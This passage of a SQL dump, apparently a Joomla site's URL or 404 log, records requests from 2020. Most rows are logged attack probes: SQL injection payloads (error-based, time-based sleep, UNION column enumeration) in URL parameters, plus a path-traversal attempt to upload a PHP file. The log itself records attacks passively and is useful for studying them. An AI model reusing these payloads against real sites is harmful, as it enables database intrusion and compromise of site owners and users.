00:00:00'),(3421,'http://infotytuvenai.lt/index.php/lt/component/user/register.html','','','',1,0,'2020-03-12 19:41:21','0000-00-00 00:00:00'),(3422,'http://infotytuvenai.lt/index.php/lt/registration/registers','','','',1,0,'2020-03-12 19:41:43','0000-00-00 00:00:00'),(3423,'http://infotytuvenai.lt/index.php/lt/?option=com_secureregistration&task=register','','','',1,0,'2020-03-12 19:42:40','0000-00-00 00:00:00'),(3424,'http://infotytuvenai.lt/index.php/lt/?option=com_comprofiler&task=registers','','','',2,0,'2020-03-12 19:43:04','0000-00-00 00:00:00'),(3425,'http://infotytuvenai.lt/index.php/lt/?option=com_joocm&view=register','','','',1,0,'2020-03-12 19:43:49','0000-00-00 00:00:00'),(3426,'http://infotytuvenai.lt/index.php/lt/?option=com_easysocial&view=registration','','','',2,0,'2020-03-12 19:43:53','0000-00-00 00:00:00'),(3428,'http://infotytuvenai.lt/index.php/lt/?option=com_djclassifieds&task=upload&tmpl=component','','','',2,0,'2020-03-24 02:00:31','0000-00-00 00:00:00'),(3429,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1586270330.php','','','',1,0,'2020-04-07 15:02:10','0000-00-00 00:00:00'),(3430,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62&Itemid=213','','','',6,0,'2020-04-08 18:21:31','0000-00-00 00:00:00'),(3431,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND (SELECT 1927 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1927=1927,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1916=1916&view=article&id=62','','','',1,0,'2020-04-08 18:21:35','0000-00-00 00:00:00'),(3432,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 1927 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1927=1927,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:21:35','0000-00-00 00:00:00'),(3433,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND (SELECT 1927 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1927=1927,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VbnE&view=article&id=62&Itemid=2','','','',1,0,'2020-04-08 18:21:39','0000-00-00 00:00:00'),(3434,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 3153=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (3153=3153) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)) AS NUMERIC) AND (4809=4','','','',1,0,'2020-04-08 18:21:40','0000-00-00 00:00:00'),(3435,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 3153=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (3153=3153) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)) AS NUMERIC)&view=article','','','',1,0,'2020-04-08 18:21:40','0000-00-00 00:00:00'),(3436,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 3153=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (3153=3153) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)) AS NUMERIC)-- tIZX&view=','','','',1,0,'2020-04-08 18:21:43','0000-00-00 00:00:00'),(3437,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 1129 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1129=1129) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113))) AND (5323=','','','',1,0,'2020-04-08 18:21:44','0000-00-00 00:00:00'),(3438,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 1129 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1129=1129) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)))&view=articl','','','',1,0,'2020-04-08 18:21:45','0000-00-00 00:00:00'),(3439,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 1129 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1129=1129) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)))-- KBch&view','','','',1,0,'2020-04-08 18:21:48','0000-00-00 00:00:00'),(3440,'http://infotytuvenai.lt/index.php/lt/?option=com_content) AND 5176=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5176=5176) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(98','','','',1,0,'2020-04-08 18:21:49','0000-00-00 00:00:00'),(3441,'http://infotytuvenai.lt/index.php/lt/?option=com_content AND 5176=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (5176=5176) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(98)','','','',1,0,'2020-04-08 18:21:50','0000-00-00 00:00:00'),(3443,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT 5288 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(5288=5288,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:21:53','0000-00-00 00:00:00'),(3444,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CONCAT(0x71766a7071,(SELECT (ELT(1281=1281,1))),0x716a766271))&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:21:54','0000-00-00 00:00:00'),(3445,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT (CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (9313=9313) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)))&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:21:55','0000-00-00 00:00:00'),(3446,'http://infotytuvenai.lt/index.php/lt/?option=(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (9636=9636) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113))&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:21:56','0000-00-00 00:00:00'),(3447,'http://infotytuvenai.lt/index.php/lt/?option=com_content);SELECT PG_SLEEP(5)--&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:21:59','0000-00-00 00:00:00'),(3448,'http://infotytuvenai.lt/index.php/lt/?option=com_content;SELECT PG_SLEEP(5)--&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:00','0000-00-00 00:00:00'),(3449,'http://infotytuvenai.lt/index.php/lt/?option=com_content);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(115)||CHR(122)||CHR(71),5) FROM DUAL--&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:08','0000-00-00 00:00:00'),(3450,'http://infotytuvenai.lt/index.php/lt/?option=com_content;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(115)||CHR(122)||CHR(71),5) FROM DUAL--&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:09','0000-00-00 00:00:00'),(3451,'http://infotytuvenai.lt/index.php/lt/?option=com_content) ORDER BY 1-- KaWI&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:12','0000-00-00 00:00:00'),(3452,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL-- Qxxp&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:12','0000-00-00 00:00:00'),(3453,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL-- RJZt&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:13','0000-00-00 00:00:00'),(3454,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL-- FJQj&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:14','0000-00-00 00:00:00'),(3455,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL-- miNd&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:15','0000-00-00 00:00:00'),(3456,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- KuzC&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:16','0000-00-00 00:00:00'),(3457,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- GEAr&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:17','0000-00-00 00:00:00'),(3458,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YlGY&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:18','0000-00-00 00:00:00'),(3459,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- NEXI&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:19','0000-00-00 00:00:00'),(3460,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SusE&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:19','0000-00-00 00:00:00'),(3461,'http://infotytuvenai.lt/index.php/lt/?option=com_content) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IHWq&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:21','0000-00-00 00:00:00'),(3462,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- JnHR&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:22','0000-00-00 00:00:00'),(3463,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- ZnDt&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:22','0000-00-00 00:00:00'),(3464,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- pcPj&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:24','0000-00-00 00:00:00'),(3465,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- APEG&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:25','0000-00-00 00:00:00'),(3466,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- hGXh&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:26','0000-00-00 00:00:00'),(3467,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- oEGb&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:27','0000-00-00 00:00:00'),(3468,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- SUua&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:28','0000-00-00 00:00:00'),(3469,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VZlh&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:30','0000-00-00 00:00:00'),(3470,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- eKqD&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:31','0000-00-00 00:00:00'),(3471,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hgdk&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:32','0000-00-00 00:00:00'),(3472,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oBsT&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:33','0000-00-00 00:00:00'),(3473,'http://infotytuvenai.lt/index.php/lt/?option=com_content ORDER BY 1-- lCEG&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:57','0000-00-00 00:00:00'),(3474,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL-- BVCh&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:58','0000-00-00 00:00:00'),(3475,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL-- qDIS&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:59','0000-00-00 00:00:00'),(3476,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL-- Ayca&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:22:59','0000-00-00 00:00:00'),(3477,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL-- bCPX&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:23:00','0000-00-00 00:00:00'),(3478,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- cEKk&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:23:01','0000-00-00 00:00:00'),(3479,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- BFLa&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:23:02','0000-00-00 00:00:00'),(3480,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wSaG&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:23:03','0000-00-00 00:00:00'),(3481,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nQSR&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:23:04','0000-00-00 00:00:00'),(3482,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ROud&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:23:05','0000-00-00 00:00:00'),(3483,'http://infotytuvenai.lt/index.php/lt/?option=com_content UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- FrFl&view=article&id=62&Itemid=213','','','',1,0,'2020-04-08 18:23:06','0000-00-00 00:00:00'),(3484,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) AND (SELECT 1266 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1266=1266,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (3608=3608','','','',1,0,'2020-04-08 18:24:47','0000-00-00 00:00:00'),(3485,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 AND (SELECT 1266 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1266=1266,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Itemid=213','','','',1,0,'2020-04-08 18:24:48','0000-00-00 00:00:00'),(3486,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 AND (SELECT 1266 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1266=1266,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dUYc&Itemid=2','','','',1,0,'2020-04-08 18:24:49','0000-00-00 00:00:00'),(3487,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) AND 6416=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (6416=6416) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)) AS N','','','',1,0,'2020-04-08 18:24:52','0000-00-00 00:00:00'),(3488,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 AND 6416=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (6416=6416) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)) AS NU','','','',1,0,'2020-04-08 18:24:53','0000-00-00 00:00:00'),(3490,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) AND 1412 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1412=1412) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHA','','','',1,0,'2020-04-08 18:24:57','0000-00-00 00:00:00'),(3491,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 AND 1412 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1412=1412) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR','','','',1,0,'2020-04-08 18:24:58','0000-00-00 00:00:00'),(3493,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) AND 2167=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2167=2167) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106','','','',1,0,'2020-04-08 18:25:03','0000-00-00 00:00:00'),(3494,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 AND 2167=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2167=2167) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)','','','',1,0,'2020-04-08 18:25:04','0000-00-00 00:00:00'),(3496,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT 4664 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(4664=4664,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Itemid=213','','','',1,0,'2020-04-08 18:25:08','0000-00-00 00:00:00'),(3497,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CONCAT(0x71766a7071,(SELECT (ELT(1419=1419,1))),0x716a766271))&Itemid=213','','','',1,0,'2020-04-08 18:25:09','0000-00-00 00:00:00'),(3498,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (5789=5789) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)))&Itemid=213','','','',1,0,'2020-04-08 18:25:10','0000-00-00 00:00:00'),(3499,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6074=6074) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113))&Itemid=21','','','',1,0,'2020-04-08 18:25:11','0000-00-00 00:00:00'),(3500,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62);SELECT PG_SLEEP(5)--&Itemid=213','','','',1,0,'2020-04-08 18:25:12','0000-00-00 00:00:00'),(3501,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62;SELECT PG_SLEEP(5)--&Itemid=213','','','',1,0,'2020-04-08 18:25:13','0000-00-00 00:00:00'),(3502,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(109)||CHR(82)||CHR(106),5) FROM DUAL--&Itemid=213','','','',1,0,'2020-04-08 18:25:20','0000-00-00 00:00:00'),(3503,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(109)||CHR(82)||CHR(106),5) FROM DUAL--&Itemid=213','','','',1,0,'2020-04-08 18:25:21','0000-00-00 00:00:00'),(3504,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) ORDER BY 1-- WXmp&Itemid=213','','','',1,0,'2020-04-08 18:25:24','0000-00-00 00:00:00'),(3505,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) ORDER BY 1998-- thGd&Itemid=213','','','',1,0,'2020-04-08 18:25:25','0000-00-00 00:00:00'),(3506,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) UNION ALL SELECT NULL-- CixD&Itemid=213','','','',1,0,'2020-04-08 18:25:26','0000-00-00 00:00:00'),(3507,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) UNION ALL SELECT NULL,NULL-- lEzm&Itemid=213','','','',1,0,'2020-04-08 18:25:27','0000-00-00 00:00:00'),(3508,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) UNION ALL SELECT NULL,NULL,NULL-- taBi&Itemid=213','','','',1,0,'2020-04-08 18:25:28','0000-00-00 00:00:00'),(3509,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) UNION ALL SELECT NULL,NULL,NULL,NULL-- lBQM&Itemid=213','','','',1,0,'2020-04-08 18:25:28','0000-00-00 00:00:00'),(3510,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- jJKO&Itemid=213','','','',1,0,'2020-04-08 18:25:29','0000-00-00 00:00:00'),(3511,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- HQPj&Itemid=213','','','',1,0,'2020-04-08 18:25:30','0000-00-00 00:00:00'),(3512,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- aWuK&Itemid=213','','','',1,0,'2020-04-08 18:25:31','0000-00-00 00:00:00'),(3513,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- xysB&Itemid=213','','','',1,0,'2020-04-08 18:25:32','0000-00-00 00:00:00'),(3514,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MlJb&Itemid=213','','','',1,0,'2020-04-08 18:25:33','0000-00-00 00:00:00'),(3515,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PkxZ&Itemid=213','','','',1,0,'2020-04-08 18:25:34','0000-00-00 00:00:00'),(3516,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 ORDER BY 1-- NRju&Itemid=213','','','',1,0,'2020-04-08 18:25:35','0000-00-00 00:00:00'),(3517,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 ORDER BY 7418-- lglv&Itemid=213','','','',1,0,'2020-04-08 18:25:36','0000-00-00 00:00:00'),(3518,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL-- ToeK&Itemid=213','','','',1,0,'2020-04-08 18:25:37','0000-00-00 00:00:00'),(3519,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL-- qlcs&Itemid=213','','','',1,0,'2020-04-08 18:25:38','0000-00-00 00:00:00'),(3520,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL-- egZN&Itemid=213','','','',1,0,'2020-04-08 18:25:39','0000-00-00 00:00:00'),(3521,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL-- hshy&Itemid=213','','','',1,0,'2020-04-08 18:25:40','0000-00-00 00:00:00'),(3522,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ZqNb&Itemid=213','','','',1,0,'2020-04-08 18:25:41','0000-00-00 00:00:00'),(3523,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- QvtP&Itemid=213','','','',1,0,'2020-04-08 18:25:42','0000-00-00 00:00:00'),(3524,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MMxu&Itemid=213','','','',1,0,'2020-04-08 18:25:43','0000-00-00 00:00:00'),(3525,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- sSju&Itemid=213','','','',1,0,'2020-04-08 18:25:44','0000-00-00 00:00:00'),(3526,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XfRf&Itemid=213','','','',1,0,'2020-04-08 18:25:45','0000-00-00 00:00:00'),(3527,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uUSH&Itemid=213','','','',1,0,'2020-04-08 18:25:46','0000-00-00 00:00:00'),(3528,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 ORDER BY 1-- mpHe&Itemid=213','','','',1,0,'2020-04-08 18:25:47','0000-00-00 00:00:00'),(3529,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 ORDER BY 2461-- Qbun&Itemid=213','','','',1,0,'2020-04-08 18:25:48','0000-00-00 00:00:00'),(3530,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL-- KQfE&Itemid=213','','','',1,0,'2020-04-08 18:25:49','0000-00-00 00:00:00'),(3531,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL-- YfXy&Itemid=213','','','',1,0,'2020-04-08 18:25:50','0000-00-00 00:00:00'),(3532,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL-- VBgE&Itemid=213','','','',1,0,'2020-04-08 18:25:51','0000-00-00 00:00:00'),(3533,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL-- JvnI&Itemid=213','','','',1,0,'2020-04-08 18:25:52','0000-00-00 00:00:00'),(3534,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- vHnc&Itemid=213','','','',1,0,'2020-04-08 18:25:53','0000-00-00 00:00:00'),(3535,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- qsNY&Itemid=213','','','',1,0,'2020-04-08 18:25:54','0000-00-00 00:00:00'),(3536,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Mbmf&Itemid=213','','','',1,0,'2020-04-08 18:25:55','0000-00-00 00:00:00'),(3537,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=62 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cuUw&Itemid=213','','','',1,0,'2020-04-08 18:25:56','0000-00-00 